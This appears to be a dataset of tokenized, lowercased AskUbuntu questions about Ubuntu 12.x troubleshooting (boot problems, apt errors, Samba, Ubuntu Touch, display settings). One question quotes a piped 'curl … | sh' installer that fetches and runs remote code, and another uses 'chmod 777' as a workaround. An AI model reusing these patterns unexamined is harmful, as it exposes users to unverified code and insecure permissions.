259561	qtcreator error ; ca n't load library ; projectexplorer ( 2.6.82 )	i try to install the new ubuntu phone sdk using the instructions here : http : //developer.ubuntu.com/resources/app-developer-cookbook/mobile/currency-converter-phone-app/ unfortunately when i run qt-creator it says a bunch of plugins failed to load : can not load plugin because dependency failed to load : projectexplorer ( 2.6.82 ) reason : /usr/lib/x86_64-linux-gnu/qtcreator/plugins/qtproject/libprojectexplorer.so : can not load library /usr/lib/x86_64-linux-gnu/qtcreator/plugins/qtproject/libprojectexplorer.so : ( libqt5declarative.so.5 : can not open shared object file : no such file or directory ) is there a missing step in the instructions , is something wrong with my setup , or is this not yet working in 12.10 ?
259563	display and projector got messy after screensaver or energy saver	i 'm a professor and i use ubuntu to show my students presentations about the content . i get my laptop connected to a projector available in the room and , that works just fine at first glance . no keys to be pressed , no annoyance . i go over monitor settings and detect/configure each one with an resolution and then use it . the issue begins when the laptop goes over the screen saver or turns off the display ( and believe me , i 've already modified the settings in order to not run into it ) . once i move the cursor or press some key , it comes back , but it sometimes messes with the order of displays ( e.g . if i drag a window to the left in order to make it appear on projector , it becomes to the right ) , or the resolution and/or the most strange : a window that shows on projector as normal gets to laptop screen when maximized or turned into fullscreen . when i resize it , goes normal ( on projector ) , when fullscreen goes to laptop . it is kind of embarrassing when your laptop refuses to obey you in front of the class . any ideas why is that happening ? hpg42-371-br precise 12.04 64 bits amd mobility radeon hd 6000m ( open source drivers - ppa oibaf ) sony projector ( do not know the model )
259567	how do i install ubuntu server using daemon tools instead of a disc ?	how do i install ubuntu server using daemon tools instead of a disc ? just trying to see if it can be done , and if so how can i do that ? i 'm looking to dual boot it with windows 8 as well . thank you .
259574	date format in file open menus in ubuntu applications	whenever i am opening a file in ubuntu applications , be it libreoffice or document viewer , the date format always appears in the mm/dd/yyyy format in the file open ( and save ) menus . please see these images , from the consistency among applications , i presume that this is something os specific rather than being application specific . i tried looking under system settings , without any avail . could you please tell me how do i set the date to dd/mm/yyyy ( or any other format of my choice ) in the file menus ? thanks .
259576	how do i make a multitouch touchscreen working on ubuntu 12.10 ?	i have a multitouch touchscreen with usb interface . it works fine on android platform . and i am working on making it to support multitouch gesture on ubuntu 12.10 . however , it acts as a single touchscreen . does any document or example could be probvided to make it work as a multitouch touchscreen on ubuntu 12.10 ?
259580	hi . i i ca n't get my ubuntu to boot ( i 'm trying to dual run it with windows 8 )	i tried what the wiki said about looking for the root.disk file . it 's there , but ubuntu still wo n't boot . help ?
259583	where to find ubuntu.application and libhud1-dev	libhud1-dev and also libhybris-dev and also libubuntu-platform-api1-dev i am also looking for a full blown libary called ubuntu.applications you know like how there is ubuntu.components seems like i can not build all the apps for desktop with out these for new touch code . i can not find them can you ? thanks
259587	alternative application switcher ( alt+tab ) in a desktop environment	if i understand correctly , each de have their own application switcher ( the thing we get by pressing alt+tab ) . my question is , can the application switcher be replaced with a different one ? i mean , for example , in unity environment , can i get cinnamon alt+tab , or maybe an entirely new one ? thanks .
259590	libapache2-mod-fastcgi `` not available ''	i 've been here http : //www.howtoforge.com/using-php5-fpm-with-apache2-on-ubuntu-12.10 and here http : //www.versatilewebsolutions.com/blog/2012/11/installing-apache-2-with-php-fastcgi-on-ubuntu-12-10.html to try to install fastcgi on 12.10 , but i keep getting package libapache2-mod-fastcgi is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libapache2-mod-fastcgi ' has no installation candidate i saw this http : //serverfault.com/questions/395139/cant-install-fastcgi-ubuntu-server-package-libapache2-mod-fastcgi-is-not-availa but my /etc/apt/sources.list says deb http : //archive.ubuntu.com/ubuntu quantal main restricted universe deb http : //archive.ubuntu.com/ubuntu quantal-updates main restricted universe deb http : //security.ubuntu.com/ubuntu quantal-security main restricted universe multiverse deb http : //archive.canonical.com/ubuntu quantal partner please help . many thanks in advance !
259595	can wine share the install directory with windows ?	i want to use starcraft 2 with wine , however it requires 18gb . my home directory wo n't let me copy it to the linux side because it says i 'm out of space when there 's over 60gb free . i realize i 'm sure there 's a way for me to increase the available disc space ... but is it ok for wine to share the same install directory for starcraft 2 as windows ?
259598	need help with samba and xbmc	i have honestly spent at least 6 to 8 hours trying to get this to work . here 's what i 've got . ubuntu-server file server rasberry pi with xbian several windows 7 machines i 've set up a samba share on the ubuntu server . i can access it from the windows machines without logging in at all but i have to manually type the address ( \gandalf\shares ) . it does n't show up in my network automatically ( i 'd like it to but whatever ) . the problem i 'm having is accessing it from xbmc . i ca n't access it from my rasberry or xbmc on my windows machines no matter how i try to get to it . it seems like i get a different error everytime . here 's the kicker , when i first got my rasberry i set all this up and it all worked perfectly . i could see it on any windows 7 machine on the network and i could get to it right from the file manager in xbmc . it took me about 30 minutes of googling and trial and error so i had no idea it would be so difficult to do again . but since then i reinstalled xbian on the pi and reinstalled ubuntu-server on the linux box . essentially , i started from scratch with the same config . i 'm really pulling my hair out over this . any suggestions would be greatly appreciated . here 's my smb.conf file [ global ] ; general server settings netbios name = gandalf server string = workgroup = fellowship announce version = 5.0 socket options = tcp_nodelay iptos_lowdelay so_keepalive so_rcvbuf=8192 so_ $ passdb backend = tdbsam security = user username map = /etc/samba/smbusers name resolve order = hosts wins bcast wins support = yes syslog = 1 syslog only = yes map to guest = bad user ; note : if you need access to the user home directories uncomment the ; lines below and adjust the settings to your hearts content . ; [ homes ] ; valid users = % s ; create mode = 0600 ; directory mode = 0755 ; browseable = no ; read only = no ; veto files = /*. { * } / . */mail/bin/ ; note : only needed if you run samba as a primary domain controller . ; not needed as this config does n't cover that matter . ; [ netlogon ] ; path = /var/lib/samba/netlogon ; admin users = administrator ; valid users = % u ; read only = no ; note : again - only needed if you 're running a primary domain controller . ; [ profiles ] ; path = /var/lib/samba/profiles ; valid users = % u ; create mode = 0600 ; directory mode = 0700 ; writeable = yes ; browseable = no [ shares ] path = /shares browseable = yes read only = no guest ok = yes # create mask = 0775 # directory mask = 0775 writeable = yes available = yes
259606	how to resize ubuntu partition with unallocated space w/gparted & livecd	i currently have one hard drive with 3 partitions and 2 partitions of unallocated space . i am dual booting windows 7 ( 1 partition ) and another partition for ubuntu 12.04 . i 'm using gparted and ubuntu 12.04 live cd with all drives unmounted , this is what i 'm seeing : /dev/sda1 . ntfs . 325gb , 292gb used . boot flag . = windows 7 ( extended ) /dev/sda2 . extended . 92.95gb . lba flag . 2a . ( extended ) /dev/sda5 . ext4 . 89gb . = ubuntu 2b . ( under extended ) unallocated . 3.82gb unallocated . 39.75gb = ? ? ? /dev/sda4 . ntfs . respawn recovery . 7.79gb . 4.27gb used . unallocated . 3.02mb . i can resize sda4 to include the 40gb of unallocated space but obviously i dont see the point in doing that to a recovery partition . i can resize sda5 to include the unallocated space of 3.82gb but would this help ? help ?
259608	how to revert back to windows after getting `` no root file system defined '' while installing ubuntu 12 using wubi	i had windows server 2008 installed on my machine and had several linux vms running on it . i had problem running a piece of code which needed opengl 3.3 on my vms so i decided to install ubuntu directly on my machine using wubi . i ran the installer and after the first restart , ubuntu installation screen comes up but at some point of time , it give me `` no root file system defined '' error which is impossible to get rid of . also , every time i restart my machine , it goes strait to ubuntu installer ! i wan na know how i can just revert back to windows ? ( precisely , how can i just cancel the ubuntu installation for good and have my windows back ? )
259614	`` power off and on '' specifc usb port	i am trying to power off and power on usb port in ubuntu 12.04 without success . i tried the steps listed below : echo `` 0 '' > `` /sys/bus/usb/devices/ $ port/power/autosuspend '' echo `` auto '' > `` /sys/bus/usb/devices/ $ port/power/level '' and echo `` auto '' > `` /sys/bus/usb/devices/2-1.3/power/control '' echo `` 0 '' > `` /sys/bus/usb/devices/2-1.3/power/autosuspend_delay_ms '' and echo suspend | sudo tee /sys/bus/usb/devices/xxxx/power/level
259615	will browsers in ubuntu touch support flash ?	will the ubuntu touch browsers support flash ? are they the same as the full desktop versions ? i would love to be able to see flash content .
259616	phablet-flash -b behind http proxy ?	i was trying `` phablet-flash -b '' but i got the following fail messages . starting new http connection ( 1 ) : cdimage.ubuntu.com retrying ( 0 attempts remain ) after connection broken by 'error ( 110 , 'connection timed out ' ) ' : /ubuntu-touch-preview/quantal/mwc-demo/quantal-ubuntu_stamp could not download build data from jenkins ... bailing i guess the download is blocked by my proxy , however , i have already export http_proxy=xxx and i can download the file via browser with the same proxy . any idea ?
259622	how to automate execution of sequence of commands in ubuntu ?	i am new to linux operating system . i am using ros ( robotic operating system ) where i type few commands in separate terminal windows for doing the setup . ie before i run my program , i have to do ( each in separate terminal ) : - karthik @ satellite-c640 : ~ $ roscore karthik @ satellite-c640 : ~ $ rosrun nodelet nodelet standalone velodyne_pointcloud/cloudnodelet karthik @ satellite-c640 : ~/desktop/opencv $ source setup.bash karthik @ satellite-c640 : ~/desktop/opencv $ rosrun pcl_tutorial front_view_bag input : =/velodyne_points karthik @ satellite-c640 : /media/be8c6d3a8c6cedf9/users/karthick/desktop/project/ros_datas $ rosbag play file2.bag the above commands are a must before i can actually run my c++ program and it is to be in the above order , issued from the respective directories . i am using ubuntu12.04 . is it possible to write a program or something ( sorry i am not familiar with linux ) so that if i run that single program , all the above commands will be properly executed in separate terminals at the respective directories rather than manually executing them each time . thanks in advance
259623	going from a dual boot ( win7 64bit/ubuntu 12.04 32 bit ) to win7/ubuntu64 using wubi	i am unable to install over the top of my 32bit ubuntu 12.04 successfully . i start out with win7 64bit and ubuntu 12.04 32 bit installed and working/booting without a problem . i decided to go to ubuntu 64 because of issues i was having with nvidia and xorg stuff . first i backed up my c drive using acronis true image 2013 , so i could start over ( as i have had to do everytime ) . my c drive ( an intel ssd 80gb drive ) looks like this before i attempt the 32 to 64 ubuntu install . sda1 100mb boot partition sda2 55gb ntfs windows 7 install directory sda3 5.5gb ext4 / ( root ) sda4 8.2gb ext4 home the swap file for ubuntu is on a different drive and so is the windows page file . my system is a core i7 950 with 12gb ram so i havent actually ever exploited paging . when i boot to a 12.04 64 bit dvd , i try the first choice ( delete ubuntu and reinstall ) , i get a message saying the size of the partition for ' ' should be 2.4 or larger , and that i should change it be that size at least . when i boot to 12.04 64 bit dvd , and try the last choice ( something else ) , and then i just specify to format the 5.5gb partiton and make it `` / '' as mount point and format it . also i specify to use the 8.2gb drive as /home ( no format ) . i run the install but when i restart i get an error saying the uuid is not found and grub prompt ... .ugh ! ! ! i then used acronis started over . everything back to functioning with 32bit.. tried boot to 12.04bit dvd , again try last choice ( something else ) , and then i play with the boot disk parm .. no matter what i do i get the uuid not found and a grub promt ... in both cases i can pf12 and tell the system to boot from my hard drive and i get the grub menu and can go into ubunto , but if choose the windows install it redisplay the grub menu . seems like mbr is screwed up in all cases , not sure where i can go from here . reinstall from acronis backup and ? ? ? ? have gotten nowhere on this .
259624	lost right as administator	i have 12.04 freshly installed in my laptop . recently i lost my rights as administrator . hereare the problems : unable to do updates from update manager ( though no problem if i do it from terminal ) . unable to shutdown/restart . when i press those buttons , i will only make the system logout . ( no problem reboot/shutdown from terminal , though ) . unable to store data into my fat32 partitions . it says permission denied . it seems i lost my administrator privileges from gui menu . how to solve this ? please help me .
259625	is it possible to list the actual commands that have been scheduled with `at` ?	i 'd like to be able to see exactly what has been scheduled with at . atq will list the job id , time to run , and user to run as , but not the actual task that will be run . thanks ! edit i should add that i 'm running on a vps , so solutions that require a gui wo n't work for me .
259630	how to use ubuntu touch developer preview	i just installed ubuntu mobile on my nexus 4 and cant seem to figure out two things , first where are the settings ? how do i access the system settings ? and two , how do i download apps ? i do n't see an app store anywhere ?
259633	wifi driver problem with ubuntu 10.10	i have installed ubuntu desktop 10.10 on my dell inspiron 1564 laptop . but i can not connect to internet using my wireless home router . it 's probably missing the device driver . can someone help me with this ?
259635	what does mean - in `netstat -tupn` output ?	here is the output of sudo netstat -tupn proto recv-q send-q local address foreign address state pid/program name tcp 0 5 192.168.1.100:55729 91.190.218.66:443 established 16422/skype tcp 0 1 192.168.1.100:34790 95.26.153.202:61189 last_ack - tcp 0 0 192.168.1.100:41233 94.127.69.2:80 established 21961/firefox tcp 1 1 192.168.1.100:38724 195.82.146.121:80 last_ack - tcp 1 0 127.0.0.1:53279 127.0.0.1:6379 close_wait 7510/ruby tcp 0 150 192.168.1.100:60051 95.26.255.169:51413 fin_wait1 - tcp 0 0 192.168.1.100:58343 157.55.56.162:443 established 16422/skype tcp 0 0 192.168.1.100:59039 64.4.61.73:443 established 16422/skype tcp 0 0 127.0.0.1:3493 127.0.0.1:35957 established 2616/upsd tcp 0 0 127.0.0.1:35957 127.0.0.1:3493 established 2620/upsmon tcp 0 0 192.168.1.100:47845 74.125.143.16:993 established 15683/thunderbird tcp 1 0 127.0.0.1:53280 127.0.0.1:6379 close_wait 7510/ruby tcp 0 196 192.168.1.100:48569 94.100.180.74:995 established 15683/thunderbird tcp 0 0 192.168.1.100:33087 94.25.137.99:443 established 1020/tmp -- disk-cac tcp 0 0 192.168.1.100:52397 85.65.133.142:50853 time_wait - tcp 0 0 192.168.1.100:56490 95.26.153.202:61189 time_wait - tcp 0 0 192.168.1.100:46865 94.229.242.27:60456 time_wait - udp6 0 0 : :1:33424 : :1:33424 established 7430/postgres what does - mean in pid/program name column ?
259640	ubuntu right click dropdown menu has very few options on upgrade to 12.10	i updated ubuntu 12.04 to 12.10 via software manager , and now when i right click on desktop i get the following dropdown menu : is this the default right click menu ? edit : now when i click on change desktop wallpaper it takes me to the settings page . i guess the appearance package is missing . also the create new- > empty document is missing . one more : arrange icons is missing
259647	how to install untrusted packages ?	i tried to install skype on ubuntu 10.04 and i received the following error : requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . details : gcc-4.6-base : i386 libaudio2 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libcomerr2 : i386 libffi6 : i386 libgcc1 : i386 libgpg-error0 : i386 libgstreamer0.10-0 : i386 libice6 : i386 libjpeg8 : i386 libkeyutils1 : i386 liblcms1 : i386 libmng1 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libpcre3 : i386 libpng12-0 : i386 libqtwebkit4 : i386 libselinux1 : i386 libsm6 : i386 libstdc++6 : i386 libuuid1 : i386 libx11-6 : i386 libxau6 : i386 libxdmcp6 : i386 libxext6 : i386 libxi6 : i386 libxrender1 : i386 libxss1 : i386 libxt6 : i386 libxv1 : i386 zlib1g : i386 how can i fix it ?
259648	my computer does n't boot without a usb drive	i installed ubuntu onto a usb drive , but now the problem i face is that the computer does n't boot without the usb inserted . it goes to grub rescue . i also have ubuntu installed on a partition on my hardisk ( after installing it on the usb ) , i would like to direct the stage 1 grub to the stage to 2 on that . i 'm pretty confused , and do n't know much about ubuntu , so please excuse my lack of knowledge .
259649	why does ubuntu fail to run .exe files ? / how do i run .exe ?	so , i just built my pc today , and am only using ubuntu until i get windows installed ( sorry , guys ! ) but when i go to click on any .exe file , nothing happens . it just sits there . no error message , nothing . i 've seen other people with similar problems , but they all get an error message . but not me ... whats going on ? how do i fix this ? help ?
259652	wired-connection problem , even though it says `` wired network-connected ''	i am having problems connecting to the internet , even though everything is properly set . but as soon as i launch mozilla firefox , it displays error messages .
259660	symfony2 cache permissions issue ubuntu 12.10	i have install lampp 1.8.1 in /opt/lampp.everything is working fine . i added my current user as owner to the htdocs folder so that i can write to htdocs folder . then i created my symfony2 project . everything worked fine and i was able to run the configuration page properly . but when i cleared the cache using command sudo php app/console cache : clear -- env=prod sudo php app/console cache : clear -- env=dev the cache gets cleared but then there is permissions issue . when i try to access the same configuration page as before it gives me an error in browser : '' runtimeexception : failed to write cache file `` /opt/lampp/htdocs/symfony/app/cache/dev/classes.php '' . '' but then when i change the permissions of the cache folder again using : sudo chmod -r 777 app/cache the page is again displayed properly i dont want to change permissions everytime after clearing the cache . is there a solution or am i doing something wrong ?
259664	how can i run photoshop cs5 in 12.04 ?	i have seen that many articles showing that photoshop cs5,4 can be run in ubuntu through wine . i want to get the photoshop for ubuntu . does someone know what i should do for now because i can not find any assistance . i have a portable version of photoshop which work fine on windows . i have not tried ( wine is still downloading ) . does someone have any idea how to use photoshop on ubuntu 12.04
259668	acer aspire v5-171-6422 dual booting	my laptop has come with win8 and secure booting through uefi ( this is very new bootloader for me ) i want to natively boot ubuntu like using bios . can anyone suggest me a way for this ? i have read ubuntu using intermediate signed bootloader and then switch to unsigned bootloader and kernel . i dont believe in security stories from microsoft on my laptop , and want to use it my way . do share with me any of the pointers you may have ps : i am happily using ubuntu 11.04 ( on desktop , laptop and vm ) as i do n't like forced unity in latest ubuntu versions . but i doubt about driver support in that version for laptop in discussion . so i can change my mindset for booting natively with uefi .
259671	ca n't unmute with alsamixer	i am using ubuntu 12.04 in combination with awesome window manager . most of the stuff ubuntu provides i do n't use . i adjust my audio volume through scripts with amixer or manually with alsamixer . however after a reboot , my audio is muted and the only way to unmute it is through the gnome-control-center sound gui . i prefer terminal so i would like to know how i can unmute my audio without having to open up a gui . also , should i maybe remove pulseaudio , since i always use alsamixer anyways ?
259673	how to manually chose unity when starting ubuntu ( tried xmonad and it is broken ) ?	i tried to install xmonad and use it on ubuntu 12.04 in vbox . unfortunately it doesnt work and all i get now is black screen on reboot . how can i manually revert to unity . edit : solved by manually booting in safe mode and then removing xmondad virus and manually changing default session . if you dont remove xmonad you can manually change settings all day but parasitic xmonad will change it back to xmonad .
259679	are there any risks to using ccsm in ubuntu 12.04 ?	i have just installed ubuntu 12.04.2 64-bit . what is the official , latest position on using ccsm ( compizconfig settings manager ) under this version of ubuntu ? i 've seen conflicting answers and comments here , some suggesting installing ccsm , others reporting that it is not supported and could break unity . i 'm missing a few features/settings , which i 'd like to change , but not at the risk of breaking a new install .
259680	how do i install the correct ethernet driver ?	so iâm new with ubuntu , and i 'm having huge problems installing the ethernet driver to get the wired connection to work . i read that downloading the compatible wireless driver will get it to work , so i did , burned it to a disc , tried to transfer it but do n't know the commands to actually install it , nor do i even know if the one i installed is the right one . i have a toshiba satellite l855-s5309 , with an atheros ar8162 fast ethernet ( rev 10 ) . also , this is the version of compatible i downloaded , compat-wireless-2012-12-18-pc.tar.bz2 . how can i solve my issue ?
259681	the program 'curl ' is currently not installed	i am trying out meteor http : //meteor.com/examples/leaderboard i have to use curl , which i am familiar with on windows . now i try to install it on ubuntu 12.04 . but i get these errors : kevin @ ubuntu : ~ $ curl https : //install.meteor.com | sh the program 'curl ' is currently not installed . you can install it by typing : sudo apt-get install curl kevin @ ubuntu : ~ $ apt-get curl e : invalid operation curl kevin @ ubuntu : ~ $ sudo apt-get curl [ sudo ] password for kevin : e : invalid operation curl how do i install curl ? solved it : i did this command sudo sed -i -e 's/us.archive.ubuntu.com/archive.ubuntu.com/g ' /etc/apt/sources.list and then i could do sudo apt-get update and then sudo apt-get install curl which successfully installed curl . update : sorry for the obvious mistake . i tried yesterday also , and there i did type the right command which , gave me this error message : kevin @ ubuntu : ~ $ sudo apt-get install curl [ sudo ] password for kevin : reading package lists ... done building dependency tree reading state information ... done package curl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'curl ' has no installation candidate update 2 : tried the apt-cache search curl | grep -i curl command kevin @ ubuntu : ~ $ apt-cache search curl | grep -i curl curlftpfs - filesystem to access ftp hosts based on fuse and curl flickcurl-doc - utilities to call the flickr api from command line - documentation flickcurl-utils - utilities to call the flickr api from command line gambas2-gb-net-curl - the gambas advanced networking component gnupg-curl - gnu privacy guard - a free pgp replacement ( curl ) libcupt2-0-downloadmethod-curl - alternative front-end for dpkg -- libcurl download method libcurl-ocaml - ocaml curl bindings ( runtime library ) libcurl-ocaml-dev - ocaml libcurl bindings ( development package ) libflickcurl-dev - c library for accessing the flickr api - development files libflickcurl0 - c library for accessing the flickr api libflickcurl0-dbg - c library for accessing the flickr api - debugging symbols libghc-curl-dev - ghc libraries for the libcurl haskell bindings libghc-curl-doc - documentation for the libcurl haskell bindings libghc-curl-prof - profiling libraries for the libcurl haskell bindings libghc-download-curl-dev - high-level file download based on urls libghc-download-curl-doc - high-level file download based on urls ; documentation libghc-download-curl-prof - high-level file download based on urls ; profiling libraries libghc-hxt-curl-dev - libcurl interface for hxt libghc-hxt-curl-doc - libcurl interface for hxt ; documentation libghc-hxt-curl-prof - libcurl interface for hxt ; profiling library libghc6-curl-dev - transitional dummy package libghc6-curl-doc - transitional dummy package libghc6-curl-prof - transitional dummy package liblua5.1-curl-dev - libcurl development files for the lua language version 5.1 liblua5.1-curl0 - libcurl bindings for the lua language version 5.1 libwww-curl-perl - perl bindings to libcurl slang-curl - transfer files using http and ftp from s-lang spl-curl - spl programming language -- curl adapter tclcurl - tcl bindings to libcurl xmms2-plugin-curl - xmms2 - curl transport for http php5-curl - curl module for php5 libcurl3-gnutls - multi-protocol file transfer library ( gnutls ) libcurl3-nss - multi-protocol file transfer library ( nss ) python-pycurl - python bindings to libcurl libcurl3 - multi-protocol file transfer library ( openssl ) update 3 : did update do sudo apt-get update before i run it . but this did not help sadly . kevin @ ubuntu : ~ $ sudo apt-get install curl libcurl3 libcurl3-dev php5-curl reading package lists ... done building dependency tree reading state information ... done package curl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libcurl3-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'curl ' has no installation candidate e : package 'libcurl3-dev ' has no installation candidate
259683	ubuntu 12.04 lost data ?	my ubuntu 12.04 suddenly rebooted after working great for a month . i checked and saw that all my downloads , installed programs and bookmarks are gone . it looks like a fresh installation all together . i wanted to check what the issue is but i ca n't become root : guest-eelhlo @ paddington-ms-7327 : ~ $ sudo -s sudo : unable to change to sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 117 , -1 , -1 ] : operation not permitted i can not even ping in the terminal : guest-eelhlo @ paddington-ms-7327 : ~ $ ping 8.8.8.8 ping : icmp open socket : permission denied how can i resolve this ?
259686	unable to log in to one specific user account in ubuntu 10.04	suddenly i am unable to log in into one of my user ( user1 ) accounts , it is blinking after booting although for other user accounts i am able to log-in properly . my /home/user1 directory is 70 % full . i am able to log-in through terminal to the user account user1 . how to solve this problem ? urgent
259697	how do i successfully remove gnome panels 12.04lts ?	so i have read many threads on various forums and tried all the prescribed key combinations to remove a panel . i have tried installing both dconf-editor and gconf-editor to change the key located at /desktop/gnome/session/required_components but the key does not exist , or is just not showing up in the editors , not sure . have also tried using killall gnome-panel but there is no running process by this name . i have also tried using the following command in terminal : gconftool-2 -- type=string -- set /desktop/gnome/session/required_components/panel 'avant-window-navigator ' , but it only created a key and made no changes to the system . i am a bit new to linux so there is probably something i am missing , but i can not find it . i am running 12.04lts and have tried all of these methods after logging into both `` gnome '' and `` gnome classic '' sessions .
259699	problems installing ubuntu on notebook	i installed manjaro from a live usb , the set up went fine but i wasnt a fan after using it for a bit . i found ubuntu easier on the command line to use so i wanted to go back . however , now i would like to return back to ubuntu , yet when booting via usb , i hit the 'minimal bask -like editing ' line and can no longer go any further . i have tried multiple live usb distros , but hit the same problem , yet the manjaro live usb works fine . could somebody help me in removing 'everything ' to allow an ubuntu install )
259703	apt-get update : waiting for headers ( ubuntu - server 12.04 )	while trying to execute the following command sudo apt-get-update i get the following message : 0 % [ waiting for headers ] [ waiting for headers ] [ waiting for headers ] [ waiting for headers ] [ waiting for headers ] the server is directly connected to internet and there is no proxy between . i am able to ping the ubuntu update servers and also use wget to download the files from the ubuntu update servers . i have also tried the solutions from the answer of this question , with no luck please help me to resolve this issue . dear friends , if you are marking my question as duplicate , please give the link of the solution . or at least the steps required to analyse this issue . thank you with regards santhanam
259704	how to remove all the images in a document in libreoffice writer ?	ubuntu 12.04 i want to remove all the images from a document in libreoffice writer . my document contains ~ 350 images . is there a way to delete them en masse rather than one by one ? i tried unchecking tools > options > libreoffice writer > view > display > `` graphics and objects '' . but the place-holders are still visible . edit : i know about saving the page as a plain text file , but i need formatting in my document .
259705	will ubuntu phone and tablet have bash ?	will the ubuntu for phone and tablet have the staple software suite installed , such as the terminal etc ? will updates be possible using apt-get ? in short will ubuntu be ubuntu ?
259706	how to provide a localized text file that opens within the language that gnome runs	i need to provide to my users a localized text file that would open ( from a desktop icon ) in the language that gnome is running . how i do that ? i am running lucid ubuntu thanks ! !
259711	windows 7 with ubuntu	i am using windows 7 . is it possible to use two operating system on the same laptop ? if yes please provide instruction to do that .
259715	ubuntu-touch on convertible ( x86 , 12.04 )	i would like to test drive ubuntu-touch on a 12.04 based convertible notebook . this is a normal notebook without android and a intel amd64 capable cpu ( not arm cpu ) . ( see also the shuttleworth presentation , e.g . http : //www.heise.de/open/meldung/ubuntu-kommt-aufs-tablet-1806342.html ) so my questions are : have someone tried this before ? what special packages i have to install ? is there a ppa containing this packages for precise ? alternative : there can i find the package sources to build them for precise in my own ppa ? any information is welcome .
259717	power manager gui settings ( not to shut down the display ) are not followed	i want my laptop not to turn off monitor when on ac power under any circumstance . and yet it becomes dark after a while - 10 minutes i guess . i think the xfce gui settings involved are these here : i am used with this type of behaviour in some xfce system programs , they do not seem to have matured enough and have many aspects that need to be adjusted , usually there are some manual tweaks or workarounds for this . or maybe is this related to a screensaver ? what to do ?
259719	qt quick ui templates missing from qt creator 's new file or project dialog	after following the getting started guide on the go mobile page , everything seems just fine . all the ubuntu specific stuff is there , but when i try to create a new project using the qt quick 2 ui template , it 's just missing . there are almost no templates available . i 'm on ubuntu 12.10 64-bit , clean install . this is how my new file or project dialog looks like .
259720	how to flash a phone or a tablet with ubuntu touch developer preview from windows	following the ubuntu touch developer preview announcement , installation instructions were published to easily install it on supported devices . these instructions require an ubuntu machine as a host device to run the flashing tools . how can developers and testers running other platforms , such as windows , flash their test tablets or phones ?
259724	installing ubuntu touch developer preview using a mac	i would love to try ubuntu touch developer preview on my galaxy nexus gsm , but the walkthrough on the website is n't for os x . thanks for any help you can provide .
259726	how can i generate an m3u playlist from the terminal ?	i 'd like to generate a m3u playlist for a directory containing mp3 files on my server from the terminal . since i 'd like to ensure that every player will be able to stream those files i 'd like to prefix each file entry with the absolute url to that directory , like this : http : //server.com/dir/file1.mp3 http : //server.com/dir/file2.mp3 ... so unfortunately simply doing ls -1 *.mp3 > play.m3u is n't enough . is there a one-liner to achieve this ?
259737	how to remove shortcuts of drives from desktop without unmounting it always ?	i have a doubt in un-mounting the drives in linux . whenever i open any drives in system its shortcut/image will be shown in the desktop . to remove that i need to right click on it and select unmount . then only that shorcut disappears . this always happens , so whenever i open any drive all of them will be there in desktop . what i need is this should n't happen . what can i do for that ? i am using ubuntu 12.04 . previously i used 10.10 then also same problem was there .
259739	kswapd0 is taking a lot of cpu	kswapd0 is taking 99.9 % of my cpu as top shows me , the problem appeared today when gaming and first time it went away after 6 minutes and now it has been doing it for about 20 minutes . how is this fixable and what is causing this ?
259743	make xfce display manager use internal monitor after restart	by default , if i connect an external display under xfce , it is not activated until i choose to in xfce4-display-settings or lxrandr . if set to use external display only and then restart with that monitor closed , the external-display setting is kept and i have no display at all ; and have to start the external monitor in order to change the settings to use the internal display . is it possible to make the internal display default at startup ( reset settings at startup ) ? or if the default xfce display manager can not have this setting , can i completely remove/replace it with lxandr while i use xfce ?
259744	to move all file with certain common string except the extension of the file to another directory	suppose there is directory with files and most of them have `` ubuntu '' string in common to the name of file . i used the command mv ubuntu1 ubuntu2 ubuntu3 ubuntu/ now i want to move all these files from this directory to other directory without moving each file differently .
259749	asking all remaining processes to terminate ... fail	ubuntu 12.10 64 bits with unity . when i restart or shutdown the pc , it takes too long to do it . it shows the line asking all remaining processes to terminate ... [ fail ] and after killing all remaining processes . how can i debug this to determine the origin of the problem ?
259750	how do i fix the package problem i have received after a failed attempt at installing qtoctave ?	i installed gnu octave 3.6.4 today straight after it was released via the commands : cd ~/octave-3.6.4 ./configure make sudo make install sudo ln -s /home/brentonhorne/octave-3.6.4/run-octave /usr/bin/octave which succeeded in installing it ( even though without the last line it did n't in the sense that running octave from the command-line did n't call it ) . i did this after i had removed the previous version that 's currently the only version available in the software centre on quantal ( i.e . gnu octave 3.6.3 ) . i then tried to install qtoctave because it was removed with gnu octave 3.6.3 when i ran sudo apt-get remove octave . upon running sudo apt-get install -f i received the error : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up octave ( 3.6.3-2~ppa1~quantal2 ) ... error : could n't read directory /usr/local/share/octave/packages : no such file or directory error : called from : error : /usr/local/share/octave/3.6.4/m/pkg/pkg.m at line 541 , column 7 error : /usr/local/share/octave/3.6.4/m/pkg/pkg.m at line 472 , column 25 dpkg : error processing octave ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for menu ... errors were encountered while processing : octave e : sub-process /usr/bin/dpkg returned an error code ( 1 )
259753	switching to ubuntu . what version ?	i 'm going to switch to ubuntu 12.10 from windows 7 , but i 'm considering waiting for 13.04 instead . what would you suggest ?
259754	wubi installer for windows 8	will it format the drive , i install it to ? like if i install it to c : , will it format c : ?
259759	how to use xfce4-display-settings terminal commands ?	what i want is a terminal command that would activate internal display in case it is de-activated in xfce . ( then , i could run this command by a script+shortkey and get a solution to this problem ) . the help of xfce4-display-settings gives this ~ $ xfce4-display-settings -h usage : xfce4-display-settings [ option ... ] help options : -h , -- help show help options -- help-all show all help options -- help-gtk show gtk+ options application options : -s , -- socket-id=socket id settings manager socket -v , -- version version information -m , -- minimal minimal interface to set up an external output -- display=display x display to use i am interested in this : -- display=display x display to use i guess it means that the command xfce4-display-settings -- display=display would activate the given display . what to enter there in place of display that would be the internal display ? what for the external display ?
